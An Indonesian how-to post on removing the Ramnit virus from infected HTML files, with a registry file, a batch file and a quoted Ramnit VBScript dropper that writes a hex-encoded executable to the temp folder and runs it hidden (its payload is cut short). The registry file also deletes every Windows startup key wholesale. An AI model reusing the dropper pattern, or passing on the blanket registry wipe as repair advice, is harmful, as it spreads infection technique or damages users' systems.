Membersihkan ramnit yang terjangkit di file htm / html

Sebelum memulai, hendaknya persiapkan dulu senjata2 yang dibutuhkan

>> ramnit_removal.reg
>> ramnit_removal.bat
>> CCleaner
>> CHANET SPLITTERII.exe
download software ini. http://www.vaksin.com/2011/0811/immune from ramnit/CHANET SPLITTERII.exe
>> Antivirus (saya menggunakan Avast)


===============================================================

Windows Registry Editor Version 5.00
[-HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupfolder]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“Userinit”=”c:\\windows\\system32\\userinit.exe”
[HKEY_CLASSES_ROOT\regfile\shell\open\command]
@=”regedit.exe \”%1\”"
[HKEY_CLASSES_ROOT\inffile\shell\open\command]
@=hex(2):22,00,25,00,31,00,22,00,20,00,25,00,2a,00,00,00
[HKEY_CLASSES_ROOT\exefile]
@=”Application”
“EditFlags”=hex:38,07,00,00
“TileInfo”=”prop:FileDescription;Company;FileVersion”
“InfoTip”=”prop:FileDescription;Company;FileVersion;Create;Size”
[HKEY_CLASSES_ROOT\exefile\DefaultIcon]
@=”%1?
[HKEY_CLASSES_ROOT\exefile\shell]
[HKEY_CLASSES_ROOT\exefile\shell\open]
“EditFlags”=hex:00,00,00,00
[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@=”\”%1\” %*”
[HKEY_CLASSES_ROOT\exefile\shell\runas]
[HKEY_CLASSES_ROOT\exefile\shell\runas\command]
@=”\”%1\” %*”

### simpan dengan nama ramnit_removal.reg

===============================================================
===============================================================

@echo off
REM “Ini untuk Remove/delete Induk Virus”
del /f /s /q /a “%ProgramFiles%\Microsoft\WaterMark.exe”>Delete_Log.txt
del /f /s /q /a “%ProgramFiles%\Microsoft\DesktopLayer.exe”>>Delete_Log.txt
del /f /s /q /a “%systemroot%\System32\dmlconf.dat”>>Delete_Log.txt
REM “This is for erase another tricky worm files, if it exist”
del /f /s /q /a “%Systemroot%\dmlconf.dat”>>Delete_Log.txt
del /f /s /q /a “%Systemroot%\lssas.exe”>>Delete_Log.txt
del /f /s /q /a “%systemroot%\ExplorerSrv.exe”>>Delete_Log.txt
del /f /s /q /a “%systemroot%\System32\rundll32Srv.exe”>>Delete_Log.txt
del /f /s /q /a “%ProgramFiles%\synaptics\syntp\SynTPEnhSrv.exe”>>Delete_Log.txt
del /f /s /q /a “%UserProfile%\Local-Settings\Application Data\\.exe”>>Delete_Log.txt
REM “Ini untuk mencegah kembalinya virus”
mkdir “%ProgramFiles%\Microsoft\WaterMark.exe”
attrib +r +s -h -a “%ProgramFiles%\Microsoft\WaterMark.exe” /s /d
mkdir “%ProgramFiles%\Microsoft\DesktopLayer.exe”
attrib +r +s -h -a “%ProgramFiles%\Microsoft\DesktopLayer.exe” /s /d
mkdir “%systemroot%\System32\dmlconf.dat”
attrib +r +s -h -a “%systemroot%\System32\dmlconf.dat” /s /d
REM “Ini untuk mengembalikan registry settings”
reg import Ramnit_removal.reg
exit

### simpan dengan nama ramnit_removal.bat ###

===============================================================


***************************************************************
***************************************************************
kedua file tersebut, letakkan di 1 folder
ramnit_removal.bat
ramnit_removal.reg

setelah itu install / double click

setelah itu, perbaiki registry dengan menggunakan CCleaner
kemudian bersihkan recycle bin

sampai disini merokok dulu biar lega :D
restart PC Anda, kemudian tekan F8
masuk ke SAFE MODE


kemudian jalankan CHANET SPLITTERII.exe. scan saja semua drive

Chanet Splitterii berfungsi untuk menghapus script bajingan ini
" <SCRIPT language=”VBScript”><! –
DropFileName = “svchost.exe”
WriteData = “4D5A90000300000004000000FFFF0000B8000000 // very long here…
Set FSO = CreateObject(“Scripting.FileSystemObject”)
DropPath = FSO.GetSpecialFolder(2) & “\” & DropFileName
If FSO.FileExists(DropPath)=False Then
Set FileObj = FSO.CreateTextFile(DropPath, True)
For i = 1 To Len(WriteData) Step 2
FileObj.Write Chr(CLng(“&H” & Mid(WriteData,i,2)))
Next
FileObj.Close
End If
Set WSHshell = CreateObject(“WScript.Shell”)
WSHshell.Run DropPath, 0
//–> "

ini biasanya terdapat disetiap file htm / html
saya menggunakan software karya anak bangsa ini untuk memudahkan.
karena ada +/- 16.000 file html yg terjangkit. kalau dihapus secara manual cape deeeh =))

kalau sudah selesai, untuk memastikan ramnit nya sudah hilang atau belum, gunakan antivirus terupdate
saya sih menggunakan Avast terbaru. kemudian saya scan melalui BOOT SCAN
Alhasil virus ramnit bersih total di PC saya
*****************************************
nyantai saja, file htm / html Anda yg terjangkit virus ramnit ini TIDAK HILANG kok
yang hilang tuh virusnya. File aman2 saja.

Sebelum Memulai hendaknya persiapkan senjata dulu : Senjata Clean Ramnit